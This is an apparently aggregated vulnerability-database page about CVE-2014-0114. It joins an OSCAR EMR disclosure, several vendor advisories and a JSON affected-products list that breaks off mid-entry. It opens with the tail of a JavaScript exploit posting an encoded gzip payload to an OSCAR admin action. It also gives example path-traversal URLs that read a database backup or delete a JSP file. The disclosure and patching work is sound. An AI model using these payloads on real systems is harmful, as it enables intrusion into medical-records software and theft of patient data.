78Du0UcD2lmHTkrsN7ISEHQwnt4U9AH2yA0IvwiFcvrJAExzf2HQvzgip1g8hSjKfgdY+/AmMXb8j4SJot6CHoQ3HOKpEYAD2QLMvLupuxP5u4zrqFddRpwLdCvQosK/e6+jmL8aDs6XLPU/nOorO2PaW6+dozesHteopDPsJDNQBhVvf3BX968GudTh3TF9Sf/qmNqVvu5zfK2lHVXS7RHQdDg14mFxnlUBQu3+udK6P3uq5+/PvPW2ykcTWClnTYS/Vtk0rJXtIkUjNgbPiQp+QCFSs5urGvV9p7aDyBI5Q6kDDBnc2rLorbn709mzrwIPhzaYJqAOP2yKGQ+ESgvauyAZVkBbJ6BdkQP4LEquQ4B9DtscYvgwAAA=="); var binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length)); for(var i = 0; i < binaryArray.length; i++) { binaryArray[i] = decodedBase64.charCodeAt(i); } var payload = new Blob([binaryArray], {type: "application/x-gzip"}); var formData = new FormData(); formData.append("file", payload); formData.append("submit", "Generate"); var xhr = new XMLHttpRequest(); xhr.open("POST", "/oscar/admin/GenerateTraceabilityReportAction.do"); xhr.send(formData);
XSS was not a focus of this test; other confirmed or likely XSS vulnerabilities are: * Reflected XSS through the errormsg parameter in loginfailed.jsp * Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp * Reflected XSS through the noteId parameter, line 1562 in CaseManagementViewAction (untested) * Reflected XSS through the pdfName parameter when an exception has been thrown, line 1174 in ManageDocumentAction (untested) * Reflected XSS through the pharmaName and pharmaFax parameters, line 149 in FrmCustomedPDFServlet (untested) * Reflected XSS through the id and followupValue parameters, line 81 in EctAddShortMeasurementAction (untested)
=== OVE-20160329-0007: SQL injection ===
On line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is concatenated into an SQL statement rather than parameterized; likewise the content parameter on lines 217, 223, and 229 of admin/logReport.jsp. In both cases these errors result in error-based SQL injection vulnerabilities; the former allows authenticated users with access to oscarMDS/PatientSearch.jsp to access information beyond their privilege levels while the latter is accessible only to administrators.
=== OVE-20160329-0008: Path traversal ===
ImportLogDownloadAction reads and outputs an arbitrary absolute file path provided by the user; DelImageAction deletes a user-specified filename without accounting for the possibility of relative path traversal (i.e., the inclusion of "../" in the filename).
Any authenticated user can exploit the former issue to steal files from the system, e.g., /oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz
An authenticated user with access to eforms can delete files writeable by the Tomcat user, e.g., /oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp
=== OVE-20160329-0002: Insecure direct object reference in document manager ===
ManageDocumentAction.display() does not check the permissions associated with the requested document ID (doc_no) before providing it to the requesting user. Given /oscar/dms/ManageDocument.do?method=display&doc_no=X&providerNo=Y, a user with access to the document management interface can view arbitrary documents by incrementing or decrementing X, regardless of whether they have been marked private.
=== OVE-20160329-0005: Denial of service via resource exhaustion ===
uploadSignature.jsp, which is accessible to and operable by unauthenticated users, saves uploaded files to a temporary directory but never deletes them. An attacker can upload many junk files and eventually consume all disk space available to the /tmp directory, impeding access to the application depending on the functionality in question and the partition layout of the host system (the effects are crippling and pervasive if /tmp is on the same partition as /; they are much less so if /tmp is on a separate partition).
=== OVE-20160329-0006: Insecure password storage ===
Passwords are stored as SHA-1 hashes; unless unusually complex, passwords stored in that manner are typically easily recoverable with a tool such as oclHashcat. In OSCAR each hash is stored as a string of decimal numbers, rather than hexadecimal or raw bytes. This somewhat non-traditional representation adds a bit of programming work to the cracking process, but does not represent a major impediment to attack.
=== OVE-20160329-0009: Cross-site request forgery ===
The application lacks protection against cross-site request forgery attacks. A CSRF attack could be used against an administrator to exploit the deserialization RCE in a manner similar to the example provided with OVE-20160329-0004.
References:
CVE-2014-0114 (SSRT101662)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
SiteScope Affected version Resolution patch details Link to download
11.1x SiteScope 11.13 Windows 32-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00315
SiteScope 11.13 Windows 64-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00316
SiteScope 11.13 Linux 32-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00317
SiteScope 11.13 Linux 64-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00318
SiteScope 11.13 Solaris 32-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00319
SiteScope 11.13 Solaris 64-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00320
11.2x SiteScope 11.24.271 Intermediate Patch for Windows 32bit and 64bit http://support.openview.hp.com/selfsolve/document/LID/SIS_00321
SiteScope 11.24.271 Intermediate Patch for Windows 32bit on 64bit http://support.openview.hp.com/selfsolve/document/LID/SIS_00322
SiteScope 11.24.271 Intermediate Patch for Linux http://support.openview.hp.com/selfsolve/document/LID/SIS_00323
SiteScope 11.24.271 Intermediate Patch for Solaris http://support.openview.hp.com/selfsolve/document/LID/SIS_00324
HISTORY Version:1 (rev.1) - 12 August 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201607-09
https://security.gentoo.org/
Severity: Normal Title: Commons-BeanUtils: Arbitrary code execution Date: July 20, 2016 Bugs: #534498 ID: 201607-09
Synopsis
Apache Commons BeanUtils does not properly suppress the class property, which could lead to the remote execution of arbitrary code.
Workaround
There is no known workaround at this time.
Resolution
All Commons BeanUtils users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/commons-beanutils-1.9.2"
References
[ 1 ] CVE-2014-0114 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0114
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201607-09
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: Red Hat A-MQ Broker 7.5 release and security update Advisory ID: RHSA-2019:2995-01 Product: Red Hat JBoss AMQ Advisory URL: https://access.redhat.com/errata/RHSA-2019:2995 Issue date: 2019-10-10 Keywords: amq,messaging,integration,broker Cross references: RHEA-2019:45713-01 CVE Names: CVE-2014-0114 ==================================================================== 1. Summary:
Red Hat A-MQ Broker 7.5 is now available from the Red Hat Customer Portal.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms.
This release of Red Hat A-MQ Broker 7.5.0 serves as a replacement for Red Hat A-MQ Broker 7.4.1, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.
Security Fix(es):
- Apache Struts 1: Class Loader manipulation via request parameters (CVE-2014-0114)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.
The References section of this erratum contains a download link (you must log in to download the update).
- Bugs fixed (https://bugzilla.redhat.com/):
1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters
- JIRA issues fixed (https://issues.jboss.org/):
ENTMQBR-2849 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters [amq-7.4.0]
- References:
https://access.redhat.com/security/cve/CVE-2014-0114 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.amq.broker&version=7.5.0 https://access.redhat.com/documentation/en-us/red_hat_amq/7.5/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBXZ7b4tzjgjWX9erEAQhy1BAAlZY3SIVWWf78mbhIhS4x+DCzq6s6W+B7 gh7bSOfLCqLNVyuqI99PH920CgZwtrN01VVt2by822MdIKKKHtbjFTzstm1ucLso QlYBLkmPzkC0xGPP4q67EDhr5KctJ4wlkerTnBhfwJxvFBLZnWzgGvmawbf3X7iQ qWwigzfVjiUwen7pv5Bol4WkzhTbvUxPEVDS696ziJI0zPyqnnDXpl+9lnXcYL0m GLsD59I984+gLxpl9fzgOPZxm2U1gGusO5rM9vUPmGX06XJo1nsUKUuhRfLoNwQm YcK6yVFE+TAOAKbmM2o62hnA/+UemV/bBQJh3ymVgjcHSz8UYae4vfmiPfiyBsVv STakDzO5yz+htMLJWVAnHjLEgbcGgzrH7jqXLzNO47bZR0oVVP6RjZnsZCdhxeT7 mPZtwWSVHFl8GRriGvEKQjC27Majwva5Hnwh82IPr5lgbLpWmvQSBzDHIObdyPts UYk+zBhZHNXzdQrnEA2BzhsXehZiMigKefutBPPEc+iXjFsLSTmGYceECyhUP/No RuQTYanb0GdgPDpgCOoDIgPtY3VyMiCur8BkQKGIyJt4aXdSaBoqAXt4KypAFExG lRVXHA8RRVcnqsxcpCA+VesIbPuTzmCSsgkQckv/TGLFgdAMLOA4J38bUCjulvMm 9D+Pu+r8KbU=kdcn -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05324755 Version: 1
HPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote Denial of Service, Arbitrary Code Execution and Cross-Site Request Forgery
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2016-11-04 Last Updated: 2016-11-04
Potential Security Impact: Local: Elevation of Privilege; Remote: Arbitrary Code Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS)
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential vulnerabilities have been identified in HPE SiteScope. The vulnerabilities could be exploited to allow local elevation of privilege and exploited remotely to allow denial of service, arbitrary code execution, cross-site request forgery.
References:
- CVE-2014-0114 - Apache Struts, execution of arbitrary code
- CVE-2016-0763 - Apache Tomcat, denial of service (DoS)
- CVE-2014-0107 - Apache XML Xalan, bypass expected restrictions
- CVE-2015-3253 - Apache Groovy, execution of arbitrary code
- CVE-2015-5652 - Python, elevation of privilege
- CVE-2013-6429 - Spring Framework, cross-site request forgery
- CVE-2014-0050 - Apache Commons FileUpload, denial of service (DoS)
- PSRT110264
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- HP SiteScope Monitors Software Series 11.2xa11.32IP1
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2013-6429
6.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L
6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVE-2014-0050
8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2014-0107
8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2014-0114
6.8 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2015-3253
7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2015-5652
8.6 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CVE-2016-0763
6.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has provided a resolution via an update to HPE SiteScope. Details on the update and each vulnerability are in the KM articles below.
Note: The resolution for each vulnerability listed is to upgrade to SiteScope 11.32IP2 or an even more recent version of SiteScope if available. The SiteScope update can be can found in the personal zone in "my updates" in HPE Software Support Online: https://softwaresupport.hpe.com.
-
Apache Commons FileUpload: KM02550251 (CVE-2014-0050):
-
Apache Struts: KM02553983 (CVE-2014-0114):
-
Apache Tomcat: KM02553990 (CVE-2016-0763):
-
Apache XML Xalan: KM02553991 (CVE-2014-0107):
-
Apache Groovy: KM02553992 (CVE-2015-3253):
-
Python: KM02553997 (CVE-2015-5652):
-
Spring Framework: KM02553998 (CVE-2013-6429):
HISTORY Version:1 (rev.1) - 4 November 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
Thanks to the efforts of Alvaro Munoz and the HP Fortify team, the Apache Struts project team can recommend a first mitigation that is relatively simple to apply. It involves the introduction of a generic Servlet filter, adding the possibility to blacklist unacceptable request parameters based on regular expressions. Please see the corresponding HP Fortify blog entry [2] for detailed instructions. Based on this information, the Apache Struts project team recommends to apply the mitigation advice immediately for all Struts 1 based applications.
Struts 1 has had its End-Of-Life announcement more than one year ago [3]. However, in a cross project effort the Struts team is looking for a correction or an improved mitigation path. Please stay tuned for further information regarding a solution.
This is a cross-list posting. If you have questions regarding this report, please direct them to security@struts.apache.org only.
[1] http://struts.apache.org/release/2.3.x/docs/s2-021.html [2] http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.U2J7xeaSxro [3] http://struts.apache.org/struts1eol-announcement.html
-- Ren\xe9 Gielen http://twitter.com/rgielen
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201404-0288",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.2.4"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.2.7"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.2.6"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.3.10"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.2.2"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.1"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.3.5"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.2.8"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.3.8"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.9,
"vendor": "apache",
"version": "1.2.9"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.8,
"vendor": "hitachi",
"version": "-09-00-00"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-09-50-03"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-09-50-00"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-09-10-10"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-09-00-12"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-08-50-13"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-08-50-00"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-10-00-03"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-10-00-00"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 1.5,
"vendor": "hitachi",
"version": "-09-10-00"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.3,
"vendor": "apache",
"version": "1.0.2"
},
{
"model": "tiered storage manager software -00 )",
"scope": "eq",
"trust": 1.2,
"vendor": "hitachi",
"version": "7.1.1"
},
{
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 1.2,
"vendor": "hitachi",
"version": "7.3-00"
},
{
"model": "commons beanutils",
"scope": "lte",
"trust": 1.0,
"vendor": "apache",
"version": "1.9.1"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "1.0"
},
{
"model": "device manager software -00 )",
"scope": "eq",
"trust": 0.9,
"vendor": "hitachi",
"version": "7.3"
},
{
"model": "device manager software )",
"scope": "eq",
"trust": 0.9,
"vendor": "hitachi",
"version": "7.4-00"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.9,
"vendor": "hitachi",
"version": "-08-11-00"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.9,
"vendor": "hitachi",
"version": "-08-00-00"
},
{
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-03"
},
{
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-00"
},
{
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "-08-11-08"
},
{
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-00"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-00"
},
{
"model": "jp1/performance management manager web option",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "-07-00"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "-08-00-12"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-03"
},
{
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-01"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-02"
},
{
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-04"
},
{
"model": "infosphere information server",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-01"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "7.4.0-02"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-00"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "7.4.0-01"
},
{
"model": "infosphere information server",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.0-06"
},
{
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-02"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-02"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.0-00"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "8.0.0-03"
},
{
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "8.0.0-04"
},
{
"model": "device manager software )",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-02"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-04"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"model": "jp1/performance management manager web option",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "-07-54"
},
{
"model": "infosphere information server",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "8.1"
},
{
"model": "infosphere information server",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "8.7"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1-01"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "-08-10-08"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "6.1.1-01"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.6,
"vendor": "hitachi",
"version": "-08-10-00"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.17"
},
{
"model": "openpages",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"model": "device manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"model": "retail allocation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.1"
},
{
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3.0.3.0"
},
{
"model": "device manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.6-00"
},
{
"model": "security qradar",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"model": "tivoli storage manager administration center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3"
},
{
"model": "tivoli workload scheduler z/os connector",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "records manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "retail clearance optimization engine",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.0"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.401"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"model": "big-ip aam",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5"
},
{
"model": "social media analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.3"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-00"
},
{
"model": "terasoluna server framework for java",
"scope": "ne",
"trust": 0.3,
"vendor": "ntt data",
"version": "2.0.5.2"
},
{
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.1-02"
},
{
"model": "big-ip webaccelerator hf7",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"model": "lotus expeditor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"model": "vcenter server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "5.1"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.1"
},
{
"model": "business process manager standard",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"model": "tivoli application dependency discovery manager",
"scope": "eq",
"trust": 0.3,
